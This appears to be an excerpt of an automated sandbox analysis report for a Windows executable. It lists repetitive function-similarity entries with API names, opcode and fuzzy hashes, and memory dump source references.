                                                                                                                Similarity
                                                                                                                • API ID: __std_fs_directory_iterator_open
                                                                                                                • String ID:
                                                                                                                • API String ID: 4007087469-0
                                                                                                                • Opcode ID: 612ddcefc7630db56f3620f1072b6d911cf3a2af5b3b5cbf471fd81d26c93fdc
                                                                                                                • Instruction ID: 1ae89995e5d8ac4f1e8391864a45426aeba53247fbe4a58d913f34610f61a48e
                                                                                                                • Opcode Fuzzy Hash: 612ddcefc7630db56f3620f1072b6d911cf3a2af5b3b5cbf471fd81d26c93fdc
                                                                                                                • Instruction Fuzzy Hash: 4B618E62F18A4285EB10DB69D4812BD23B1AB447E8F004736EE3D96AD5FF3CD9859340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 2444108017-0
                                                                                                                • Opcode ID: 5f2961302959c0ed5e282d88b8909df76f76c0f003f9f14efc1921d5f91e8f12
                                                                                                                • Instruction ID: 1054c247e359f9ad7ebc1bf9ee16012934f4a881d91a640a1ff9d56a5738384d
                                                                                                                • Opcode Fuzzy Hash: 5f2961302959c0ed5e282d88b8909df76f76c0f003f9f14efc1921d5f91e8f12
                                                                                                                • Instruction Fuzzy Hash: 83314462D18B8581E7208F25E44026AB761FB997F4F505325FABD42AD5EF7CD1818B40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 497c1e7926f3d444a968bab04cca3fa9f68789f660d1b6e4e5e77ce73ce49532
                                                                                                                • Instruction ID: 6e80432dcaa3583758ed013cfa09eb82509fbc1efd7ccc53df0088d45791534e
                                                                                                                • Opcode Fuzzy Hash: 497c1e7926f3d444a968bab04cca3fa9f68789f660d1b6e4e5e77ce73ce49532
                                                                                                                • Instruction Fuzzy Hash: 5221A463E18B8681EB509B25E45076AB761EFC57D4F405231EAAE82AD9EF2CD184CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Info$User
                                                                                                                • String ID:
                                                                                                                • API String ID: 2017065092-0
                                                                                                                • Opcode ID: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
                                                                                                                • Instruction ID: 12a5388da233541a71958963723ebd34b742d289d7d59ee75a440f0e765aab42
                                                                                                                • Opcode Fuzzy Hash: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
                                                                                                                • Instruction Fuzzy Hash: F4119332A1878682D7108F61E52075EB3A1FB80BD8F545235EB9943B59DF7CD4908B44
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
                                                                                                                • Instruction ID: ae9f5ec614788775fcc8f0114b69b97167a27e455188bd223ab11b43a8deca0f
                                                                                                                • Opcode Fuzzy Hash: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
                                                                                                                • Instruction Fuzzy Hash: 25D09E11F18B4352EB542F705DA90BC12A56FA9781F50153CD93FC63D3EF2DA5494A00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProfile
                                                                                                                • String ID: Unknown
                                                                                                                • API String ID: 2104809126-1654365787
                                                                                                                • Opcode ID: 22e8dba5ae4e86c0326f8be6cf605145216d5eee1111140a83b2067be56ce9ba
                                                                                                                • Instruction ID: d9da066f2232435aadb808845e3ec6f21a0daff7e5258d3992664a9b1877e41d
                                                                                                                • Opcode Fuzzy Hash: 22e8dba5ae4e86c0326f8be6cf605145216d5eee1111140a83b2067be56ce9ba
                                                                                                                • Instruction Fuzzy Hash: 5531E323A2CBC186E710CF25E4502AAB370FBD9784F545225EBDD42A86EF7CD695CB00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e9e48158083ab0eca5a4c5bb0c2db97b4ea0ad2ac3ee641f55f804f8c60b5fb
                                                                                                                • Instruction ID: 07a3273dc3df087ef0c04ed7c94b502f128499afef69f5932e4eaa6256547c8b
                                                                                                                • Opcode Fuzzy Hash: 0e9e48158083ab0eca5a4c5bb0c2db97b4ea0ad2ac3ee641f55f804f8c60b5fb
                                                                                                                • Instruction Fuzzy Hash: A6A16D72A04B8186EB108F25D8843AD77B1FB89BD8F188235DA5D87795EF3CD581CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: 13b637be0ddcb408af887a2a38cfcbd2b757141b0a68db11de9dd26df8918e9b
                                                                                                                • Instruction ID: c4027fcaa02ed0c055a66bfda2bf535f9c814f917623a83237f559781b4d9b27
                                                                                                                • Opcode Fuzzy Hash: 13b637be0ddcb408af887a2a38cfcbd2b757141b0a68db11de9dd26df8918e9b
                                                                                                                • Instruction Fuzzy Hash: D6619926A09A8184EB189E16D19437D37B2AB44FD8F558631CE7D8B3D5EF3CE886D700
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3087652857-0
                                                                                                                • Opcode ID: b5d7b45dfa31f96b17104aaadbe9ae254155d4525c9ed658e5f32041e5771e92
                                                                                                                • Instruction ID: ba934370f2da63d64787b1d59d6ea7a18e8e9361a7668b1471fc552689248751
                                                                                                                • Opcode Fuzzy Hash: b5d7b45dfa31f96b17104aaadbe9ae254155d4525c9ed658e5f32041e5771e92
                                                                                                                • Instruction Fuzzy Hash: 1E718F72A18B8585EB108B64E8403AD77B1F7897D4F505321EAAD87BD9EF7CD144C740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: f1662d7706c7589218ceb8d0a30793c2331b3c095fc89e1204711d7945b9f2de
                                                                                                                • Instruction ID: 0669145fb2d8aa9df7c5fd597d35fd20e2a634a60b5238652aef99ba8c0c82c7
                                                                                                                • Opcode Fuzzy Hash: f1662d7706c7589218ceb8d0a30793c2331b3c095fc89e1204711d7945b9f2de
                                                                                                                • Instruction Fuzzy Hash: 3641B162B08B8585EB109F12A1242AD6362BB48FD4F984731DF7D8B7C9EF3DD1419300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: 21cbd9060dcfa65a00406c0847a2e258ff3a67741ef0e8835a8aa18e29e20441
                                                                                                                • Instruction ID: 7c39f4e5a99c24866e4d92ca4d0695f79e706dd20dac9d81c15a6e131af94e32
                                                                                                                • Opcode Fuzzy Hash: 21cbd9060dcfa65a00406c0847a2e258ff3a67741ef0e8835a8aa18e29e20441
                                                                                                                • Instruction Fuzzy Hash: 01416F72618B8585DB28DB65E54427AA3A1FB48BD0F548736EBBD43BC9EF3DE1418300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: b2d3eb39100ffe7ca6075ba45aad7cd097a3ddd15555f804f6effb7240c15951
                                                                                                                • Instruction ID: 412b8ac3b6bf21e9d9fefd79f6cc9654997ddb47c73d5f8c2b388c29174d325b
                                                                                                                • Opcode Fuzzy Hash: b2d3eb39100ffe7ca6075ba45aad7cd097a3ddd15555f804f6effb7240c15951
                                                                                                                • Instruction Fuzzy Hash: 11312462B1578641FF14EB26A41007A6260BB44FE4F908B35DE7D837D6EF3DE0418340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: 29ede17e78d66e1ff03075e107dc94fa6a0ff7a82e23768c21060c6f5b695a31
                                                                                                                • Instruction ID: a3ae1e28f4cd0eb54defefbb23bd8be7423d94b2da8a1445ae77d4116e361cc3
                                                                                                                • Opcode Fuzzy Hash: 29ede17e78d66e1ff03075e107dc94fa6a0ff7a82e23768c21060c6f5b695a31
                                                                                                                • Instruction Fuzzy Hash: C241C3A1B0974285EF14AB12A5243B9A361BB48BD8F944735EF7D4B7CAEF3DD1419300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 4269842375-0
                                                                                                                • Opcode ID: 910c72d77a2eee9013dd7d018ca37c84aa499ce84e75e0b5e19abdf6a0978468
                                                                                                                • Instruction ID: caf4869d65aed594dcfb4699190aed04aafc8638fbed43a3a971ee65599401d1
                                                                                                                • Opcode Fuzzy Hash: 910c72d77a2eee9013dd7d018ca37c84aa499ce84e75e0b5e19abdf6a0978468
                                                                                                                • Instruction Fuzzy Hash: B4518F32E18B8186E710CF64D4403AD77B1FB99788F505321EBAD93A99EF78D684CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 2371198981-0
                                                                                                                • Opcode ID: 0c938f5ff597287b413f46e3d76a37b7088594cabf2e2eb79db2830f1b0d95ab
                                                                                                                • Instruction ID: 18b4b722e2175812c0dd63b43518da5e250116d31d3fddfcbe148858f5f44053
                                                                                                                • Opcode Fuzzy Hash: 0c938f5ff597287b413f46e3d76a37b7088594cabf2e2eb79db2830f1b0d95ab
                                                                                                                • Instruction Fuzzy Hash: CF21D433E09B4245FB28AB15A56037962A0AB54BE4F644735DA7C83BD6FF3CD5D28340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
                                                                                                                • Instruction ID: 039cf5012befb679d7ff192462fb3258772d25ae127806fbdfd3b33e705f04fb
                                                                                                                • Opcode Fuzzy Hash: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
                                                                                                                • Instruction Fuzzy Hash: F2319C32A19A4782EF54EB15D8501B9A370ABA5BD1F950235E62ECB3D2FF3DE601C740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 47109696-0
                                                                                                                • Opcode ID: f1dca321947a1367f0d55f51290a78f41f5e328790fa86022a41bb21031095aa
                                                                                                                • Instruction ID: d4a915f6b6e5fe76bc6949c7136515403ce13343562f657d68cd422052a3c5cc
                                                                                                                • Opcode Fuzzy Hash: f1dca321947a1367f0d55f51290a78f41f5e328790fa86022a41bb21031095aa
                                                                                                                • Instruction Fuzzy Hash: 9F21A821F28A8145EB509B25E8503BAA370EF95BD4F585231FA6D87BD5EF2CD441C740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
